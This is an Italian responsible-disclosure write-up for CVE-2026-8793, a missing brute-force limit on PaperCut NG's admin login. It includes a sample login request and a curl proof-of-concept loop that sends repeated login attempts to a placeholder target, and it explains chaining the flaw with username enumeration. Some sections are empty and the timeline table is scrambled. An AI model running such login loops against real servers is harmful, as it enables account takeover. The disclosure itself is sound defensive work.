
Write-up di divulgazione responsabile per CVE-2026-8793 - PaperCut NG 25.0.11
| Campo | Dettagli |
|---|---|
| ID CVE | CVE-2026-8793 |
| Prodotto | PaperCut NG |
| Versione interessata | 25.0.11 (Build 75758) e precedenti |
| CWE | CWE-307 — Limitazione impropria dei tentativi di autenticazione eccessivi |
| Punteggio CVSS | 5.3 (Medio) — autonomo; aumenta quando concatenato con CVE-2026-8794 |
| Ricercatore | Vivien LEBAS (@Hazaz) |
| Segnalato | Maggio 2026 |
| Stato | Corretto — PaperCut NG 26.0.3 |
L'interfaccia di amministrazione web di PaperCut NG non implementa alcuna forma di protezione brute-force sul proprio endpoint di accesso. Un attaccante non autenticato può inviare un numero illimitato di tentativi di autenticazione contro qualsiasi account senza innescare il blocco dell'account, sfide CAPTCHA o limitazione della velocità delle richieste.
Se combinata con CVE-2026-8794 (enumerazione dei nomi utente tramite canale laterale temporale), questa vulnerabilità consente un attacco completamente mirato: prima enumerare silenziosamente i nomi degli account validi, quindi eseguire tentativi di accesso illimitati contro tali account senza rischio di rilevamento o blocco a livello applicativo.
POST /app HTTP/1.1
Host: <target>:9191
Content-Type: application/x-www-form-urlencoded
service=direct/1/Home/%24Form&inputUsername=admin&inputPassword=<password>
Comportamento osservato
Dieci tentativi consecutivi di autenticazione non riusciti contro l'account amministratore integrato hanno prodotto risposte HTTP 200 identiche, senza alcun cambiamento comportamentale:
Proof of Concept:
for i in $(seq 1 10); do
curl -s -o /dev/null -w "Attempt $i: HTTP %{http_code} — Time: %{time_total}s\n" \
-X POST "http://<target>:9191/app" \
-H "Origin: http://<target>:9191" \
--data "service=direct/1/Home/%24Form&inputUsername=admin&inputPassword=wrongpassword$i"
done
Tutti e dieci i tentativi restituiscono HTTP 200 senza alcuna differenza osservabile nel tempo di risposta o nel contenuto, confermando l'assenza di qualsiasi meccanismo di limitazione.
Catena di attacco con CVE-2026-8794
Questa vulnerabilità ha il massimo impatto se concatenata con CVE-2026-8794:
Impatto
PaperCut NG è ampiamente distribuito in ambienti aziendali ed educativi in cui l'interfaccia web gestisce code di stampa, fatturazione e accesso degli utenti. Il compromesso di un account amministrativo fornisce il controllo completo sull'infrastruttura di stampa e sui dati degli utenti.
Per gli amministratori (mitigazioni provvisorie):
Cronologia
| Data | Evento |
|---|---|
| 9 maggio 2026 | Segnalazione iniziale inviata al PaperCut Security Team |
Riferimenti
Divulgazione effettuata in conformità con i principi di responsible disclosure. I dettagli tecnici completi sono stati condivisi con il PaperCut Security Team prima della pubblicazione.
Ricercatore: Vivien LEBAS — @Hazaz
| 10 maggio 2026 |
| Ricevuta conferma di ricezione |
| Maggio 2026 | CVE-2026-8793 assegnato da PaperCut (CNA) |
| Agosto 2026 | Patch rilasciata — PaperCut NG 26.0.3 |
| Agosto 2026 | Divulgazione pubblica coordinata con il fornitore |